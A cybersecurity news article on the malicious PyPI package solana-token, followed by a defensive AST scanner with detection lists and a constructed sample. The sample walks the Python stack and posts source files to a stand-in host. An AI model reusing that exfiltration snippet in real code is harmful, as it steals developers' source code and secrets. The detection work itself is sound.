A newly discovered malicious Python package, solana-token, has been weaponized to steal source code and sensitive secrets from developers working on Solana blockchain applications. Uploaded to the Python Package Index (PyPI), the module masqueraded as a legitimate utility for Solana-based projects but harbored code designed to exfiltrate critical data to a remote server.

ReversingLabs researchers identified the threat in May 2025, noting its rapid dissemination: the package was downloaded over 600 times before its removal. Notably, the attackers reused the solana-token name from a 2024 PyPI package removed for similar activity. ReversingLabs analysts highlighted the package’s unique focus on source code exfiltration, a tactic less common in typical infostealer campaigns. When invoked, this function iterates through the Python execution stack, identifying .py files unrelated to specific libraries (prices.py, importlib).

By harvesting developers’ unprotected secrets (e.g., API keys, wallet credentials), attackers gain a foothold in cryptocurrency projects, posing risks to both individual developers and decentralized platforms. The campaign aligns with a broader trend: 23 malicious crypto-focused supply chain attacks were documented in 2024 alone, per RL’s 2025 Software Supply Chain Security Report.

Developers are urged to audit dependencies, monitor for suspicious network activity, and adopt tools like static code analysis to detect obfuscated threats. As supply chain attacks evolve, proactive defense remains critical to safeguarding sensitive code and infrastructure.

Tushar is a cybersecurity content editor with a passion for creating captivating and informative content.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 15 May 2025 06:20:19 +0000
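The article describes code that walks the Python execution stack to find .py files and recommends static code analysis for auditing dependencies. The following is an added example, not code from the article, ReversingLabs, or the package: a heuristic AST scan that flags a source file combining stack inspection, file reads and a network client import. The signal lists, function names and both sample sources are assumptions constructed for the demonstration.

```python
import ast

# Heuristic signal lists: assumptions for this example, not taken from the package.
STACK_CALLS = {"inspect.stack", "inspect.currentframe", "sys._getframe"}
NETWORK_MODULES = {"requests", "urllib", "urllib.request", "http.client", "socket"}
FILE_READ_CALLS = {"open", "read_text", "read_bytes"}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else the trailing attribute."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return parts[0] if parts else ""

def scan_source(source):
    """Return the signals found: 'stack_walk', 'file_read', 'network'."""
    signals = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            modules = [node.module]
        else:
            modules = []
        if any(m in NETWORK_MODULES for m in modules):
            signals.add("network")
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in STACK_CALLS:
                signals.add("stack_walk")
            if name.rsplit(".", 1)[-1] in FILE_READ_CALLS:
                signals.add("file_read")
    return signals

def is_suspicious(source):
    """Flag code that walks the stack, reads files and imports a network client."""
    return {"stack_walk", "file_read", "network"} <= scan_source(source)

# Constructed samples for the demonstration (not code from the real package).
SAMPLE_FLAGGED = '''
import inspect, requests
for frame in inspect.stack():
    if frame.filename.endswith(".py"):
        requests.post("https://collector.example.invalid", data=open(frame.filename).read())
'''
SAMPLE_BENIGN = "import inspect\nname = inspect.stack()[1].function\n"
```

Aliased imports such as `from inspect import stack` are not resolved by this scan, so a hit is a prompt for manual review of the dependency rather than a verdict.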